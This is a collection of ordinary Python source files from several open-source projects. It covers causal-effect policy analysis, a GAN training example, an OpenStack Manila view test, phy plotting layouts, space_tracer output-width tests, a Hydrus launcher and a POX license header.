means the gain from increasing the treatment by 10% of the typical amount for units where the treatment should
be increased and decreasing the treatment by 10% of the typical amount when not.
The third item is the value of always treating. This is a list, with one entry per non-control-treatment for
discrete features, or just a single entry for continuous features, again increasing by 10% of a typical amount.
Parameters
----------
X : array-like
Features
feature_index
Index of the feature to be considered as treament
treatment_costs: array-like, default 0
Cost of treatment, as a scalar value or per-sample. For continuous features this is the marginal cost per
unit of treatment; for discrete features, this is the difference in cost between each of the non-default
values and the default value (i.e., if non-scalar the array should have shape (n,d_t-1))
max_depth : int, default 3
maximum depth of the tree
min_samples_leaf : int, default 2
minimum number of samples on each leaf
min_value_increase : float, default 1e-4
The minimum increase in the policy value that a split needs to create to construct it
alpha : float in [0, 1], default 0.05
Confidence level of the confidence intervals displayed in the leaf nodes.
A (1-alpha)*100% confidence interval is displayed.
Returns
-------
output : _PolicyOutput
"""
(intrp, feature_names, treatment_names,
(policy_val, always_trt)) = self._tree(True, Xtest, feature_index,
treatment_costs=treatment_costs,
max_depth=max_depth,
min_samples_leaf=min_samples_leaf,
min_impurity_decrease=min_value_increase,
alpha=alpha)
def policy_data(tree, node_id, node_dict):
return {'treatment': treatment_names[np.argmax(tree.value[node_id])]}
return _PolicyOutput(_tree_interpreter_to_dict(intrp, feature_names, policy_data),
policy_val,
{treatment_names[i + 1]: val
for (i, val) in enumerate(always_trt.tolist())},
treatment_names[0])
# TODO: it seems like it would be better to just return the tree itself rather than plot it;
# however, the tree can't store the feature and treatment names we compute here...
def plot_heterogeneity_tree(self, Xtest, feature_index, *,
max_depth=3, min_samples_leaf=2, min_impurity_decrease=1e-4,
include_model_uncertainty=False,
alpha=0.05):
"""
Plot an effect hetergoeneity tree using matplotlib.
Parameters
----------
X : array-like
Features
feature_index
Index of the feature to be considered as treament
max_depth : int, default 3
maximum depth of the tree
min_samples_leaf : int, default 2
minimum number of samples on each leaf
min_impurity_decrease : float, default 1e-4
The minimum decrease in the impurity/uniformity of the causal effect that a split needs to
achieve to construct it
include_model_uncertainty : bool, default False
Whether to include confidence interval information when building a simplified model of the cate model.
alpha : float in [0, 1], default 0.05
Confidence level of the confidence intervals displayed in the leaf nodes.
A (1-alpha)*100% confidence interval is displayed.
"""
intrp, feature_names, treatment_names, _ = self._tree(False, Xtest, feature_index,
max_depth=max_depth,
min_samples_leaf=min_samples_leaf,
min_impurity_decrease=min_impurity_decrease,
include_model_uncertainty=include_model_uncertainty,
alpha=alpha)
return intrp.plot(feature_names=feature_names,
treatment_names=treatment_names)
def _heterogeneity_tree_output(self, Xtest, feature_index, *,
max_depth=3, min_samples_leaf=2, min_impurity_decrease=1e-4,
include_model_uncertainty=False, alpha=0.05):
"""
Get an effect heterogeneity tree expressed as a dictionary.
Parameters
----------
X : array-like
Features
feature_index
Index of the feature to be considered as treament
max_depth : int, optional (default=3)
maximum depth of the tree
min_samples_leaf : int, optional (default=2)
minimum number of samples on each leaf
min_impurity_decrease : float, optional (default=1e-4)
The minimum decrease in the impurity/uniformity of the causal effect that a split needs to
achieve to construct it
include_model_uncertainty : bool, default False
Whether to include confidence interval information when building a simplified model of the cate model.
alpha : float in [0, 1], default 0.05
Confidence level of the confidence intervals displayed in the leaf nodes.
A (1-alpha)*100% confidence interval is displayed.
"""
intrp, feature_names, _, _ = self._tree(False, Xtest, feature_index,
max_depth=max_depth,
min_samples_leaf=min_samples_leaf,
min_impurity_decrease=min_impurity_decrease,
include_model_uncertainty=include_model_uncertainty,
alpha=alpha)
def hetero_data(tree, node_id, node_dict):
if include_model_uncertainty:
return {'effect': _sanitize(tree.value[node_id]),
'ci': _sanitize(node_dict[node_id]['ci'])}
else:
return {'effect': _sanitize(tree.value[node_id])}
return _tree_interpreter_to_dict(intrp, feature_names, hetero_data)
def individualized_policy(self, Xtest, feature_index, *, n_rows=None, treatment_costs=0, alpha=0.05):
"""
Get individualized treatment policy based on the learned model for a feature, sorted by the predicted effect.
Parameters
----------
Xtest: array-like
Features
feature_index: int or string
Index of the feature to be considered as treatment
n_rows: int, optional
How many rows to return (all rows by default)
treatment_costs: array-like, default 0
Cost of treatment, as a scalar value or per-sample. For continuous features this is the marginal cost per
unit of treatment; for discrete features, this is the difference in cost between each of the non-default
values and the default value (i.e., if non-scalar the array should have shape (n,d_t-1))
alpha: float in [0, 1], default 0.05
Confidence level of the confidence intervals
A (1-alpha)*100% confidence interval is returned
Returns
-------
output: DataFrame
Dataframe containing recommended treatment, effect, confidence interval, sorted by effect
"""
result = self._safe_result_index(Xtest, feature_index)
# get dataframe with all but selected column
orig_df = pd.DataFrame(Xtest, columns=self.feature_names_).rename(
columns={self.feature_names_[result.feature_index]: 'Current treatment'})
Xtest = result.X_transformer.transform(Xtest)
if Xtest.shape[1] == 0:
x_rows = Xtest.shape[0]
Xtest = None
if result.feature_baseline is None:
# apply 10% of a typical treatment for this feature
effect = result.estimator.effect_inference(Xtest, T1=result.treatment_value * 0.1)
else:
effect = result.estimator.const_marginal_effect_inference(Xtest)
if Xtest is None: # we got a scalar effect although our original X may have had more rows
effect = effect._expand_outputs(x_rows)
multi_y = (not self._vec_y) or self.classification
if multi_y and result.feature_baseline is not None and np.ndim(treatment_costs) == 2:
# we've got treatment costs of shape (n, d_t-1) so we need to add a y dimension to broadcast safely
treatment_costs = np.expand_dims(treatment_costs, 1)
effect.translate(-treatment_costs)
est = effect.point_estimate
est_lb = effect.conf_int(alpha)[0]
est_ub = effect.conf_int(alpha)[1]
if multi_y: # y was an array, not a vector
est = np.squeeze(est, 1)
est_lb = np.squeeze(est_lb, 1)
est_ub = np.squeeze(est_ub, 1)
if result.feature_baseline is None:
rec = np.empty(est.shape[0], dtype=object)
rec[est > 0] = "increase"
rec[est <= 0] = "decrease"
# set the effect bounds; for positive treatments these agree with
# the estimates; for negative treatments, we need to invert the interval
eff_lb, eff_ub = est_lb, est_ub
eff_lb[est <= 0], eff_ub[est <= 0] = -eff_ub[est <= 0], -eff_lb[est <= 0]
# the effect is now always positive since we decrease treatment when negative
eff = np.abs(est)
else:
# for discrete treatment, stack a zero result in front for control
zeros = np.zeros((est.shape[0], 1))
all_effs = np.hstack([zeros, est])
eff_ind = np.argmax(all_effs, axis=1)
treatment_arr = np.array([result.feature_baseline] + [lvl for lvl in result.feature_levels], dtype=object)
rec = treatment_arr[eff_ind]
# we need to call effect_inference to get the correct CI between the two treatment options
effect = result.estimator.effect_inference(Xtest, T0=orig_df['Current treatment'], T1=rec)
# we now need to construct the delta in the cost between the two treatments and translate the effect
current_treatment = orig_df['Current treatment'].values
if np.ndim(treatment_costs) >= 2:
# remove third dimenions potentially added
if multi_y: # y was an array, not a vector
treatment_costs = np.squeeze(treatment_costs, 1)
assert treatment_costs.shape[1] == len(treatment_arr) - 1, ("If treatment costs are an array, "
" they must be of shape (n, d_t-1),"
" where n is the number of samples"
" and d_t the number of treatment"
" categories.")
all_costs = np.hstack([zeros, treatment_costs])
# find cost of current treatment: equality creates a 2d array with True on each row,
# only if its the location of the current treatment. Then we take the corresponding cost.
current_cost = all_costs[current_treatment.reshape(-1, 1) == treatment_arr.reshape(1, -1)]
target_cost = np.take_along_axis(all_costs, eff_ind.reshape(-1, 1), 1).reshape(-1)
else:
assert isinstance(treatment_costs, (int, float)), ("Treatments costs should either be float or "
"a 2d array of size (n, d_t-1).")
all_costs = np.array([0] + [treatment_costs] * (len(treatment_arr) - 1))
# construct index of current treatment
current_ind = (current_treatment.reshape(-1, 1) ==
treatment_arr.reshape(1, -1)) @ np.arange(len(treatment_arr))
current_cost = all_costs[current_ind]
target_cost = all_costs[eff_ind]
delta_cost = current_cost - target_cost
# add second dimension if needed for broadcasting during translation of effect
if multi_y:
delta_cost = np.expand_dims(delta_cost, 1)
effect.translate(delta_cost)
eff = effect.point_estimate
eff_lb, eff_ub = effect.conf_int(alpha)
if multi_y: # y was an array, not a vector
eff = np.squeeze(eff, 1)
eff_lb = np.squeeze(eff_lb, 1)
eff_ub = np.squeeze(eff_ub, 1)
df = pd.DataFrame({'Treatment': rec,
'Effect of treatment': eff,
'Effect of treatment lower bound': eff_lb,
'Effect of treatment upper bound': eff_ub},
index=orig_df.index)
return df.join(orig_df).sort_values('Effect of treatment',
ascending=False).head(n_rows)
def _individualized_policy_dict(self, Xtest, feature_index, *, n_rows=None, treatment_costs=0, alpha=0.05):
"""
Get individualized treatment policy based on the learned model for a feature, sorted by the predicted effect.
Parameters
----------
Xtest: array-like
Features
feature_index: int or string
Index of the feature to be considered as treatment
n_rows: int, optional
How many rows to return (all rows by default)
treatment_costs: array-like, default 0
Cost of treatment, as a scalar value or per-sample
alpha: float in [0, 1], default 0.05
Confidence level of the confidence intervals
A (1-alpha)*100% confidence interval is returned
Returns
-------
output: dictionary
dictionary containing treatment policy, effects, and other columns
"""
return self.individualized_policy(Xtest, feature_index,
n_rows=n_rows,
treatment_costs=treatment_costs,
alpha=alpha).to_dict('list')
def typical_treatment_value(self, feature_index):
"""
Get the typical treatment value used for the specified feature
Parameters
----------
feature_index: int or string
The index of the feature to be considered as treatment
Returns
-------
treatment_value : float
The treatment value considered 'typical' for this feature
"""
result = [res for res in self._results if res.feature_index == feature_index]
if len(result) == 0:
if self._has_column_names:
result = [res for res in self._results if res.feature_name == feature_index]
assert len(result) == 1, f"Could not find feature with index/name {feature_index}"
return result[0].treatment_value
else:
raise ValueError(f"No feature with index {feature_index}")
return result[0].treatment_value
|
examples/gan.py | maxferrari/Torchelie | 117 | 17044 | import argparse
import copy
import torch
from torchvision.datasets import MNIST, CIFAR10
import torchvision.transforms as TF
import torchelie as tch
import torchelie.loss.gan.hinge as gan_loss
from torchelie.recipes.gan import GANRecipe
import torchelie.callbacks as tcb
from torchelie.recipes import Recipe
parser = argparse.ArgumentParser()
parser.add_argument('--cpu', action='store_true')
opts = parser.parse_args()
device = 'cpu' if opts.cpu else 'cuda'
BS = 32
tfms = TF.Compose([
TF.Resize(64),
tch.transforms.AdaptPad((64, 64)),
TF.RandomHorizontalFlip(),
TF.ToTensor()])
ds = CIFAR10('~/.cache/torch/cifar10', download=True, transform=tfms)
dl = torch.utils.data.DataLoader(ds,
num_workers=4,
batch_size=BS,
shuffle=True)
def train_net(Gen, Discr):
G = Gen(in_noise=128, out_ch=3)
G_polyak = copy.deepcopy(G).eval()
D = Discr()
print(G)
print(D)
def G_fun(batch):
z = torch.randn(BS, 128, device=device)
fake = G(z)
preds = D(fake * 2 - 1).squeeze()
loss = gan_loss.generated(preds)
loss.backward()
return {'loss': loss.item(), 'imgs': fake.detach()}
def G_polyak_fun(batch):
z = torch.randn(BS, 128, device=device)
fake = G_polyak(z)
return {'imgs': fake.detach()}
def D_fun(batch):
z = torch.randn(BS, 128, device=device)
fake = G(z)
fake_loss = gan_loss.fake(D(fake * 2 - 1))
fake_loss.backward()
x = batch[0]
real_loss = gan_loss.real(D(x * 2 - 1))
real_loss.backward()
loss = real_loss.item() + fake_loss.item()
return {'loss': loss, 'real_loss': real_loss.item(), 'fake_loss':
fake_loss.item()}
loop = GANRecipe(G, D, G_fun, D_fun, G_polyak_fun, dl, log_every=100).to(device)
loop.register('polyak', G_polyak)
loop.G_loop.callbacks.add_callbacks([
tcb.Optimizer(tch.optim.RAdamW(G.parameters(), lr=1e-4, betas=(0., 0.99))),
tcb.Polyak(G, G_polyak),
])
loop.register('G_polyak', G_polyak)
loop.callbacks.add_callbacks([
tcb.Log('batch.0', 'x'),
tcb.WindowedMetricAvg('real_loss'),
tcb.WindowedMetricAvg('fake_loss'),
tcb.Optimizer(tch.optim.RAdamW(D.parameters(), lr=4e-4, betas=(0., 0.99))),
])
loop.test_loop.callbacks.add_callbacks([
tcb.Log('imgs', 'polyak_imgs'),
tcb.VisdomLogger('main', prefix='test')
])
loop.to(device).run(100)
train_net(tch.models.autogan_64, tch.models.snres_discr_4l)
|
manila/tests/api/views/test_quota_class_sets.py | openstack/manila | 159 | 17092 | <gh_stars>100-1000
# Copyright (c) 2017 Mirantis, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import ddt
from manila.api.openstack import api_version_request as api_version
from manila.api.views import quota_class_sets
from manila import test
from manila.tests.api import fakes
@ddt.ddt
class ViewBuilderTestCase(test.TestCase):
def setUp(self):
super(ViewBuilderTestCase, self).setUp()
self.builder = quota_class_sets.ViewBuilder()
def test__collection_name(self):
self.assertEqual('quota_class_set', self.builder._collection_name)
@ddt.data(
("fake_quota_class", "2.40"), (None, "2.40"),
("fake_quota_class", "2.39"), (None, "2.39"),
("fake_quota_class", "2.53"), (None, "2.53"),
("fake_quota_class", "2.62"), (None, "2.62"),
)
@ddt.unpack
def test_detail_list_with_share_type(self, quota_class, microversion):
req = fakes.HTTPRequest.blank('/quota-sets', version=microversion)
quota_class_set = {
"shares": 13,
"gigabytes": 31,
"snapshots": 14,
"snapshot_gigabytes": 41,
"share_groups": 15,
"share_group_snapshots": 51,
"share_networks": 16,
}
expected = {self.builder._collection_name: {
"shares": quota_class_set["shares"],
"gigabytes": quota_class_set["gigabytes"],
"snapshots": quota_class_set["snapshots"],
"snapshot_gigabytes": quota_class_set["snapshot_gigabytes"],
"share_networks": quota_class_set["share_networks"],
}}
if quota_class:
expected[self.builder._collection_name]['id'] = quota_class
if (api_version.APIVersionRequest(microversion) >= (
api_version.APIVersionRequest("2.40"))):
expected[self.builder._collection_name][
"share_groups"] = quota_class_set["share_groups"]
expected[self.builder._collection_name][
"share_group_snapshots"] = quota_class_set[
"share_group_snapshots"]
if req.api_version_request >= api_version.APIVersionRequest("2.53"):
fake_share_replicas_value = 46
fake_replica_gigabytes_value = 100
expected[self.builder._collection_name]["share_replicas"] = (
fake_share_replicas_value)
expected[self.builder._collection_name][
"replica_gigabytes"] = fake_replica_gigabytes_value
quota_class_set['share_replicas'] = fake_share_replicas_value
quota_class_set['replica_gigabytes'] = fake_replica_gigabytes_value
if req.api_version_request >= api_version.APIVersionRequest("2.62"):
fake_per_share_gigabytes = 10
expected[self.builder._collection_name][
"per_share_gigabytes"] = fake_per_share_gigabytes
quota_class_set['per_share_gigabytes'] = fake_per_share_gigabytes
result = self.builder.detail_list(
req, quota_class_set, quota_class=quota_class)
self.assertEqual(expected, result)
|
phy/plot/interact.py | ycanerol/phy | 118 | 17103 | <filename>phy/plot/interact.py
# -*- coding: utf-8 -*-
"""Common layouts."""
#------------------------------------------------------------------------------
# Imports
#------------------------------------------------------------------------------
import logging
import numpy as np
from phylib.utils import emit
from phylib.utils.geometry import get_non_overlapping_boxes, get_closest_box
from .base import BaseLayout
from .transform import Scale, Range, Subplot, Clip, NDC
from .utils import _get_texture, _in_polygon
from .visuals import LineVisual, PolygonVisual
logger = logging.getLogger(__name__)
#------------------------------------------------------------------------------
# Grid
#------------------------------------------------------------------------------
class Grid(BaseLayout):
"""Layout showing subplots arranged in a 2D grid.
Constructor
-----------
shape : tuple or str
Number of rows, cols in the grid.
shape_var : str
Name of the GLSL uniform variable that holds the shape, when it is variable.
box_var : str
Name of the GLSL variable with the box index.
has_clip : boolean
Whether subplots should be clipped.
Note
----
To be used in a grid, a visual must define `a_box_index` (by default) or another GLSL
variable specified in `box_var`.
"""
margin = .075
n_dims = 2
active_box = (0, 0)
_scaling = (1., 1.)
def __init__(self, shape=(1, 1), shape_var='u_grid_shape', box_var=None, has_clip=True):
super(Grid, self).__init__(box_var=box_var)
self.shape_var = shape_var
self._shape = shape
ms = 1 - self.margin
mc = 1 - self.margin
# Define the GPU transforms of the Grid layout.
# 1. Global scaling.
self.gpu_transforms.add(Scale(self._scaling, gpu_var='u_grid_scaling'))
# 2. Margin.
self.gpu_transforms.add(Scale((ms, ms)))
# 3. Clipping for the subplots.
if has_clip:
self.gpu_transforms.add(Clip([-mc, -mc, +mc, +mc]))
# 4. Subplots.
self.gpu_transforms.add(Subplot(
# The parameters of the subplots are callable as they can be changed dynamically.
shape=lambda: self._shape, index=lambda: self.active_box,
shape_gpu_var=self.shape_var, index_gpu_var=self.box_var))
def attach(self, canvas):
"""Attach the grid to a canvas."""
super(Grid, self).attach(canvas)
canvas.gpu_transforms += self.gpu_transforms
canvas.inserter.insert_vert(
"""
attribute vec2 {};
uniform vec2 {};
uniform vec2 u_grid_scaling;
""".format(self.box_var, self.shape_var),
'header', origin=self)
def add_boxes(self, canvas, shape=None):
"""Show subplot boxes."""
shape = shape or self.shape
assert isinstance(shape, tuple)
n, m = shape
n_boxes = n * m
a = 1 - .0001
pos = np.array([[-a, -a, +a, -a],
[+a, -a, +a, +a],
[+a, +a, -a, +a],
[-a, +a, -a, -a],
])
pos = np.tile(pos, (n_boxes, 1))
box_index = []
for i in range(n):
for j in range(m):
box_index.append([i, j])
box_index = np.vstack(box_index)
box_index = np.repeat(box_index, 8, axis=0)
boxes = LineVisual()
# We exclude this interact when adding the visual.
canvas.add_visual(boxes, clearable=False)
boxes.set_data(pos=pos)
boxes.set_box_index(box_index)
canvas.update()
def get_closest_box(self, pos):
"""Get the box index (i, j) closest to a given position in NDC coordinates."""
x, y = pos
rows, cols = self.shape
j = np.clip(int(cols * (1. + x) / 2.), 0, cols - 1)
i = np.clip(int(rows * (1. - y) / 2.), 0, rows - 1)
return i, j
def update_visual(self, visual):
"""Update a visual."""
super(Grid, self).update_visual(visual)
if self.shape_var in visual.program:
visual.program[self.shape_var] = self._shape
visual.program['u_grid_scaling'] = self._scaling
@property
def shape(self):
"""Return the grid shape."""
return self._shape
@shape.setter
def shape(self, value):
self._shape = value
self.update()
@property
def scaling(self):
"""Return the grid scaling."""
return self._scaling
@scaling.setter
def scaling(self, value):
self._scaling = value
self.update()
#------------------------------------------------------------------------------
# Boxed
#------------------------------------------------------------------------------
class Boxed(BaseLayout):
"""Layout showing plots in rectangles at arbitrary positions. Used by the waveform view.
The boxes are specified via their center positions and optional sizes, in which case
an iterative algorithm is used to find the largest box size that will not make them overlap.
Constructor
----------
box_pos : array-like (2D, shape[1] == 2)
Position of the centers of the boxes.
box_var : str
Name of the GLSL variable with the box index.
keep_aspect_ratio : boolean
Whether to keep the aspect ratio of the bounds.
Note
----
To be used in a boxed layout, a visual must define `a_box_index` (by default) or another GLSL
variable specified in `box_var`.
"""
margin = .1
n_dims = 1
active_box = 0
_box_scaling = (1., 1.)
_layout_scaling = (1., 1.)
_scaling_param_increment = 1.1
def __init__(self, box_pos=None, box_var=None, keep_aspect_ratio=False):
super(Boxed, self).__init__(box_var=box_var)
self._key_pressed = None
self.keep_aspect_ratio = keep_aspect_ratio
self.update_boxes(box_pos)
self.gpu_transforms.add(Range(
NDC, lambda: self.box_bounds[self.active_box],
from_gpu_var='vec4(-1, -1, 1, 1)', to_gpu_var='box_bounds'))
def attach(self, canvas):
"""Attach the boxed interact to a canvas."""
super(Boxed, self).attach(canvas)
canvas.gpu_transforms += self.gpu_transforms
canvas.inserter.insert_vert("""
#include "utils.glsl"
attribute float {};
uniform sampler2D u_box_pos;
uniform float n_boxes;
uniform vec2 u_box_size;
uniform vec2 u_layout_scaling;
""".format(self.box_var), 'header', origin=self)
canvas.inserter.insert_vert("""
// Fetch the box bounds for the current box (`box_var`).
vec2 box_pos = fetch_texture({}, u_box_pos, n_boxes).xy;
box_pos = (2 * box_pos - 1); // from [0, 1] (texture) to [-1, 1] (NDC)
box_pos = box_pos * u_layout_scaling;
vec4 box_bounds = vec4(box_pos - u_box_size, box_pos + u_box_size);
""".format(self.box_var), 'start', origin=self)
def update_visual(self, visual):
"""Update a visual."""
super(Boxed, self).update_visual(visual)
box_pos = _get_texture(self.box_pos, (0, 0), self.n_boxes, [-1, 1])
box_pos = box_pos.astype(np.float32)
if 'u_box_pos' in visual.program:
logger.log(5, "Update visual with interact Boxed.")
visual.program['u_box_pos'] = box_pos
visual.program['n_boxes'] = self.n_boxes
visual.program['u_box_size'] = np.array(self.box_size) * np.array(self._box_scaling)
visual.program['u_layout_scaling'] = self._layout_scaling
def update_boxes(self, box_pos):
"""Update the box positions and automatically-computed size."""
self.box_pos, self.box_size = get_non_overlapping_boxes(box_pos)
def add_boxes(self, canvas):
"""Show the boxes borders."""
n_boxes = len(self.box_pos)
a = 1 + .05
pos = np.array([[-a, -a, +a, -a],
[+a, -a, +a, +a],
[+a, +a, -a, +a],
[-a, +a, -a, -a],
])
pos = np.tile(pos, (n_boxes, 1))
boxes = LineVisual()
box_index = np.repeat(np.arange(n_boxes), 8)
canvas.add_visual(boxes, clearable=False)
boxes.set_data(pos=pos, color=(.5, .5, .5, 1))
boxes.set_box_index(box_index)
canvas.update()
# Change the box bounds, positions, or size
#--------------------------------------------------------------------------
@property
def n_boxes(self):
"""Total number of boxes."""
return len(self.box_pos)
@property
def box_bounds(self):
"""Bounds of the boxes."""
bs = np.array(self.box_size)
return np.c_[self.box_pos - bs, self.box_pos + bs]
def get_closest_box(self, pos):
"""Get the box closest to some position."""
return get_closest_box(pos, self.box_pos, self.box_size)
# Box scaling
#--------------------------------------------------------------------------
def _increment_box_scaling(self, cw=1., ch=1.):
self._box_scaling = (self._box_scaling[0] * cw, self._box_scaling[1] * ch)
self.update()
@property
def box_scaling(self):
return self._box_scaling
def expand_box_width(self):
return self._increment_box_scaling(cw=self._scaling_param_increment)
def shrink_box_width(self):
return self._increment_box_scaling(cw=1. / self._scaling_param_increment)
def expand_box_height(self):
return self._increment_box_scaling(ch=self._scaling_param_increment)
def shrink_box_height(self):
return self._increment_box_scaling(ch=1. / self._scaling_param_increment)
# Layout scaling
#--------------------------------------------------------------------------
def _increment_layout_scaling(self, cw=1., ch=1.):
self._layout_scaling = (self._layout_scaling[0] * cw, self._layout_scaling[1] * ch)
self.update()
@property
def layout_scaling(self):
return self._layout_scaling
def expand_layout_width(self):
return self._increment_layout_scaling(cw=self._scaling_param_increment)
def shrink_layout_width(self):
return self._increment_layout_scaling(cw=1. / self._scaling_param_increment)
def expand_layout_height(self):
return self._increment_layout_scaling(ch=self._scaling_param_increment)
def shrink_layout_height(self):
return self._increment_layout_scaling(ch=1. / self._scaling_param_increment)
class Stacked(Boxed):
"""Layout showing a number of subplots stacked vertically.
Parameters
----------
n_boxes : int
Number of boxes to stack vertically.
box_var : str
Name of the GLSL variable with the box index.
origin : str
top or bottom
Note
----
To be used in a boxed layout, a visual must define `a_box_index` (by default) or another GLSL
variable specified in `box_var`.
"""
margin = 0
_origin = 'bottom'
def __init__(self, n_boxes, box_var=None, origin=None):
self._origin = origin or self._origin
assert self._origin in ('top', 'bottom')
box_pos = self.get_box_pos(n_boxes)
super(Stacked, self).__init__(box_pos, box_var=box_var, keep_aspect_ratio=False)
@property
def n_boxes(self):
"""Number of boxes."""
return len(self.box_pos)
@n_boxes.setter
def n_boxes(self, n_boxes):
if n_boxes >= 1:
self.update_boxes(self.get_box_pos(n_boxes))
def get_box_pos(self, n_boxes):
"""Return the box bounds for a given number of stacked boxes."""
# Signal bounds.
b = np.zeros((n_boxes, 2))
b[:, 1] = np.linspace(-1, 1, n_boxes)
if self._origin == 'top':
b = b[::-1, :]
return b
@property
def origin(self):
"""Whether to show the channels from top to bottom (`top` option, the default), or from
bottom to top (`bottom`)."""
return self._origin
@origin.setter
def origin(self, value):
self._origin = value
self.update_boxes(self.get_box_pos(self.n_boxes))
self.update()
def attach(self, canvas):
"""Attach the stacked interact to a canvas."""
BaseLayout.attach(self, canvas)
canvas.gpu_transforms += self.gpu_transforms
canvas.inserter.insert_vert("""
#include "utils.glsl"
attribute float {};
uniform float n_boxes;
uniform bool u_top_origin;
uniform vec2 u_box_size;
""".format(self.box_var), 'header', origin=self)
canvas.inserter.insert_vert("""
float margin = .1 / n_boxes;
float a = 1 - 2. / n_boxes + margin;
float b = -1 + 2. / n_boxes - margin;
float u = (u_top_origin ? (n_boxes - 1. - {bv}) : {bv}) / max(1., n_boxes - 1.);
float y0 = -1 + u * (a + 1);
float y1 = b + u * (1 - b);
float ym = .5 * (y0 + y1);
float yh = u_box_size.y * (y1 - ym);
y0 = ym - yh;
y1 = ym + yh;
vec4 box_bounds = vec4(-1., y0, +1., y1);
""".format(bv=self.box_var), 'before_transforms', origin=self)
def update_visual(self, visual):
"""Update a visual."""
BaseLayout.update_visual(self, visual)
if 'n_boxes' in visual.program:
visual.program['n_boxes'] = self.n_boxes
visual.program['u_box_size'] = self._box_scaling
visual.program['u_top_origin'] = self._origin == 'top'
#------------------------------------------------------------------------------
# Interactive tools
#------------------------------------------------------------------------------
class Lasso(object):
"""Draw a polygon with the mouse and find the points that belong to the inside of the
polygon."""
def __init__(self):
self._points = []
self.canvas = None
self.visual = None
self.box = None
def add(self, pos):
"""Add a point to the polygon."""
x, y = pos.flat if isinstance(pos, np.ndarray) else pos
self._points.append((x, y))
logger.debug("Lasso has %d points.", len(self._points))
self.update_lasso_visual()
@property
def polygon(self):
"""Coordinates of the polygon vertices."""
l = self._points
# Close the polygon.
# l = l + l[0] if len(l) else l
out = np.array(l, dtype=np.float64)
out = np.reshape(out, (out.size // 2, 2))
assert out.ndim == 2
assert out.shape[1] == 2
return out
def clear(self):
"""Reset the lasso."""
self._points = []
self.box = None
self.update_lasso_visual()
@property
def count(self):
"""Number of vertices in the polygon."""
return len(self._points)
def in_polygon(self, pos):
"""Return which points belong to the polygon."""
return _in_polygon(pos, self.polygon)
def attach(self, canvas):
"""Attach the lasso to a canvas."""
canvas.attach_events(self)
self.canvas = canvas
self.create_lasso_visual()
def create_lasso_visual(self):
"""Create the lasso visual."""
self.visual = PolygonVisual()
self.canvas.add_visual(self.visual, clearable=False)
def update_lasso_visual(self):
"""Update the lasso visual with the current polygon."""
if not self.visual and self.count > 0:
return
# The following call updates a_box_index with the active box in BaseLayout.
self.visual.set_data(pos=self.polygon)
self.canvas.update()
def on_mouse_click(self, e):
"""Add a polygon point with ctrl+click."""
if 'Control' in e.modifiers:
if e.button == 'Left':
layout = getattr(self.canvas, 'layout', None)
if hasattr(layout, 'box_map'):
box, pos = layout.box_map(e.pos)
# Only update the box for the first click, so that the box containing
# the lasso is determined by the first click only.
if self.box is None:
self.box = box
# Avoid clicks outside the active box (box of the first click).
if box != self.box:
return
else: # pragma: no cover
pos = self.canvas.window_to_ndc(e.pos)
# Force the active box to be the box of the first click, not the box of the
# current click.
if layout:
layout.active_box = self.box
self.add(pos) # call update_lasso_visual
emit("lasso_updated", self.canvas, self.polygon)
else:
self.clear()
self.box = None
def __repr__(self):
return str(self.polygon)
|
test/PySrc/tests/test_code_tracer_width.py | lifubang/live-py-plugin | 224 | 17114 | <gh_stars>100-1000
from space_tracer.main import replace_input, TraceRunner
def test_source_width_positive():
code = """\
i = 1 + 1
"""
expected_report = """\
i = 1 + | i = 2"""
with replace_input(code):
report = TraceRunner().trace_command(['space_tracer',
'--source_width', '8',
'--traced_file', 'foo.py'])
assert report == expected_report
def test_source_width_negative():
code = """\
i = 1 + 1
"""
expected_report = """\
i = 1 + | i = 2"""
with replace_input(code):
report = TraceRunner().trace_command(['space_tracer',
'--source_width', '-2',
'--traced_file', 'foo.py'])
assert report == expected_report
def test_source_indent():
code = """\
i = 1 + 1
"""
expected_report = """\
i = 1 + 1 | i = 2"""
with replace_input(code):
report = TraceRunner().trace_command(['space_tracer',
'--source_indent', '4',
'--traced_file', 'foo.py'])
assert report == expected_report
def test_source_indent_small():
code = """\
i = 1 + 1
"""
expected_report = """\
i = 1 + 1 | i = 2"""
with replace_input(code):
report = TraceRunner().trace_command(['space_tracer',
'--source_indent', '2',
'--traced_file', 'foo.py'])
assert report == expected_report
def test_source_indent_negative():
code = """\
i = 1 + 1
"""
expected_report = """\
= 1 + 1 | i = 2"""
with replace_input(code):
report = TraceRunner().trace_command(['space_tracer',
'--source_indent', '-2',
'--traced_file', 'foo.py'])
assert report == expected_report
def test_trace_width():
code = """\
i = 1 + 1
"""
expected_report = """\
i = 1 + 1 | i ="""
with replace_input(code):
report = TraceRunner().trace_command(['space_tracer',
'--trace_width', '15',
'--traced_file', 'foo.py'])
assert report == expected_report
def test_trace_width_negative():
code = """\
i = 1 + 1
s = 'a' * 10
"""
expected_report = """\
i = 1 + 1 | i = 2
s = 'a' * 10 | s = 'aaaaaa"""
with replace_input(code):
report = TraceRunner().trace_command(['space_tracer',
'--trace_width', '-5',
'--traced_file', 'foo.py'])
assert report == expected_report
def test_trace_width_without_source():
code = """\
i = 1 + 1
s = 'a' * 10
"""
expected_report = """\
i = 2
s = 'aaaaaa"""
with replace_input(code):
report = TraceRunner().trace_command(['space_tracer',
'--source_width', '0',
'--trace_width', '-5',
'--traced_file', 'foo.py'])
assert report == expected_report
def test_trace_offset():
code = """\
i = 1 + 1
s = 'a' * 10
"""
expected_report = """\
i = 1 + 1 | 2
s = 'a' * 10 | 'aaaaaaaaaa'"""
with replace_input(code):
report = TraceRunner().trace_command(['space_tracer',
'--trace_offset', '3',
'--traced_file', 'foo.py'])
assert report == expected_report
|
client.pyw | thatfuckingbird/hydrus-websocket-server | 1,417 | 17135 | <filename>client.pyw
#!/usr/bin/env python3
# Hydrus is released under WTFPL
# You just DO WHAT THE FUCK YOU WANT TO.
# https://github.com/sirkris/WTFPL/blob/master/WTFPL.md
from hydrus import hydrus_client
if __name__ == '__main__':
hydrus_client.boot()
|
pox/lib/interfaceio/__init__.py | korrigans84/pox_network | 416 | 17157 | # Copyright 2017 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at:
#
# http://www.apache.org/licenses/LICENSE-2.0
